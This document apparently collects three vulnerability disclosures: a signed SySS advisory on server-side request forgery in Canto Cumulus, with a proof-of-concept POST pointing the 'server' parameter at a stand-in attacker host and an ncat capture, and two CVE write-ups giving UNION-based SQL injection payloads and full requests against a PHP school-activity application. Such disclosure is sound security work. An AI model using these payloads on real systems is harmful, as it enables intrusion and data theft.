\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-023 Product: Canto Cumulus Manufacturer: Canto Inc. Affected Version(s): Through 11.1.3 Tested Version(s): 11.1.3 (Build 26f5823e) Vulnerability Type: Server-Side Request Forgery (CWE-918) Risk Level: High Solution Status: Mitigation possible Manufacturer Notification: 2022-03-25 Solution Date: No solution Public Disclosure: 2022-06-01 CVE Reference: Not yet assigned Author of Advisory: Thibaud Kehler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Canto Cumulus is a digital asset management (DAM).\[1\] Due to missing validation of untrusted input, the Cumulus web server is vulnerable to server-side request forgery (SSRF) with an unknown proprietary protocol. This behavior poses a risk for denial-of-service (DoS) attacks, impersonation attacks and attacks on the protocol with the theoretical result of remote code execution (RCE) or authentication bypass. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When logging in to the web server via the form at the URL https://hostname.example/cwc/login, a hidden URL parameter 'server' is sent to the server in the respective HTTP POST request to https://hostname.example/cwc/catalog. Afterwards, the web server establishes a TCP connection to the system specified in that request via an unknown protocol. This yields the following problems: \* Denial of service: The web server keeps the TCP connection open for around 60 seconds. This could be misused to fill limited resources on the server or the server's infrastructure, e.g. NAT tables or connection pools, resulting in a DoS. \* Internal port scan: The web server would respond differently if it was able to establish a connection to the specified TCP port. An attacker could use this behavior to conduct a port scan on the internal network. \* Authentication bypass (theoretical): As the server is specified during authentication, it might be possible that the server-side request is used to verify the credentials given to the login form. An attacker could pretend to be an authentication server and forge a successful login or elevated privileges to the web application. \* Protocol attacks (theoretical): The server-side request uses an unknown binary protocol. An attacker might launch further attacks on that protocol, e.g. buffer overflow or deserialization attacks. In the worst case, if the server implementation of the protocol is vulnerable to such attacks, this will result in RCE on the server. SySS recommends restricting web server-side requests to a limited set of trusted servers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An attacker can specify an arbitrary IP address / hostname and port, as depicted in the following HTTP POST request: POST /cwc/catalog HTTP/1.1 Host: hostname.example User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:98.0) Gecko/20100101 Firefox/98.0 Content-Type: application/x-www-form-urlencoded Content-Length: 123 OWASP\_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encmpoding=UTF-8&server=server.attacker:80 During the response, the web server connects to the specified TCP port on the specified host via an unknown proprietary protocol: # ncat -nlvp 80 | hexdump -C Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from \[WAN IP\]. Ncat: Connection from \[WAN IP\]:10402. 00000000 00 00 00 28 72 65 63 6f 00 00 00 02 00 00 00 04 |...(reco........| 00000010 63 4d 49 44 4c 6f 6e 67 73 69 52 51 00 00 00 04 |cMIDLongsiRQ....| 00000020 53 65 72 23 4c 6f 6e 67 00 04 77 7b 00 00 00 18 |Ser#Long..w{....| 00000030 72 65 63 6f 00 00 00 01 00 00 00 04 63 4d 49 44 |reco........cMID| 00000040 4c 6f 6e 67 51 75 69 74 |LongQuit| 00000048 If the specified host responds in an unexpected way, the web server closes the server-side connection and responds to the initial HTTP request with HTTP error code 302 and a redirection to an error page: HTTP/1.1 302 Server: nginx Date: Wed, 23 Mar 2022 16:31:43 GMT Content-Type: text/json;charset=utf-8 Content-Length: 0 Connection: keep-alive Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=16070400 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true If the DNS name cannot be resolved or if the specified TCP port is unreachable, the server responds with HTTP error code 500 and renders the login form with HTML containing an additional error message which states that the server could not be reached. This differing behavior enables the internal port scan. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer has not released a patch and will not address the vulnerability. The manufacturer recommends securing the Cumulus server by using a firewall. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-03-18: Vulnerability discovered 2022-03-25: Vulnerability reported to the manufacturer 2022-05-11: Manufacturer informed SySS that it will not address the vulnerability 2022-06-01: Public disclosure of the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Canto Cumulus https://www.canto.com/de/cumulus/ \[2\] SySS Security Advisory SYSS-2022-023 (not yet published) https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: thibaud.kehler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud\_Kehler.asc Key ID: 0xB645 7D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmKWCXIACgkQ6ceYZrZF fXqI7A//ZiwtJccj1fcb1EcVK1l4jHU3ZXcJrcYFib4jqzYgZ+NQXA1OVFmJ8P9a MaK9/9GCTjRUnHL0zJfv2Q18GwDaFcq3Ecv61l0IttgOwPmZk3bdGhbiZbuNkid9 n8WBCtzMoPYb8b8BvGDmbjhGcIWfLBJ4hf9nspeIP12MtYNe0qwYXQJsDrZwmUgu bqD5AnXItyYSDe690LRweAh5vAtdvtp+7SQLOPfi49QyG9sxb9jw1qsK8KVZNutt nIwSD5SFrCCgVvEn6E02FHGW7ttEivxSPTN60FsoGhhCD7V1zeu2teNaZvarETek cnSuYgNNBCdPhCm6WDDMgw5vNOUqg0UE1CqZjZ84DBOu4ABBMF4PV9JBFYbOeWTK XYmVsREJVFnvF+qmXDVfEoByaKsXX1yIZkJwGYFXGS3bvFpaipMGLbRFzc49abPI sv5Vth94AmnTyHsG73tM93d3y5BRLpwxwuRSmG5PRzbuZet8ThPH4Hoc1OAysNTa zsCm3VkSemX0Ba8z6mL4IwuknYoetuKQli37jAx7jGsfetFc9tKvHsk3dQ9w+wQG 040DaLa8NsBh+b1PeQZj6AVC+qH6OgGADl5l0Dnh3VcQW3eWUV0YgQofgOsbili6 6CGZNJwE8HkWX5U4HuTaF/A3b8BaFd0IailYTDGc3SaLz4XOAyU= =FDje -----END PGP SIGNATURE-----

CVE-2022-40305

School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the component /modules/modstudent/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: Moye

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/modstudent/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/modstudent/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/modstudent/index.php?view=edit&id=-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /activity/admin/modules/modstudent/index.php?view\=edit&id\=\-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38269: bug_report/SQLi-2.md at main · moyess/bug_report

School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the component /modules/autonumber/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: Moye

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/autonumber/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/autonumber/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/autonumber/index.php?view=edit&id=-1%27%20union%20select%201,database(),3,4,5--+ // Leak place ---> id

GET /activity/admin/modules/autonumber/index.php?view\=edit&id\=\-1%27%20union%20select%201,database(),3,4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

Tag

#firefox